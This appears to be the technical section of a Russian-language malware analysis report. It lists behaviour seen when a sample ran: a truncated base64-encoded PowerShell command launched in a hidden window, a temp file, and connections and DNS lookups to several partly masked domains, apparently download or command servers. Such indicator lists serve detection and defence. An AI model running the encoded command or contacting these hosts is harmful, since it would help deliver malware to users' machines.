Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD IAAgACQAcQBQAFoATgBDAD0AIAAgAFsAVAB5AHAARQBdACgAIgB7ADAAfQB7ADUAfQB7ADIAfQB7ADQAfQB7ADMAfQB7ADEAfQAiACAALQBGACcAcwAnACwAJwB5ACcALAAnAC4AaQBPACcALAAnAHQATwBSACcALAAnAC4AZA...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1420
- %TEMP%\833076.cvr
- 'ed####othingmcr.com':80
- 'th####miumplace.com':443
- 'sa###ate.com':443
- 'jo####oronel.com':443
- http://www.ed####othingmcr.com/indexing/c9/
- 'sa###ate.com':443
- 'jo####oronel.com':443
- DNS ASK in######cquanaogiare.com
- DNS ASK ed####othingmcr.com
- DNS ASK th####miumplace.com
- DNS ASK fl#####onsultancy.com
- DNS ASK ud####lopiano.com
- DNS ASK sa###ate.com
- DNS ASK jo####oronel.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD IAAgACQAcQBQAFoATgBDAD0AIAAgAFsAVAB5AHAARQBdACgAIgB7ADAAfQB7ADUAfQB7ADIAfQB7ADQAfQB7ADMAfQB7ADEAfQAiACAALQBGACcAcwAnACwAJwB5ACcALAAnAC4AaQBPACcALAAnAHQATwBSACcALAAnAC4AZA... (со скрытым окном)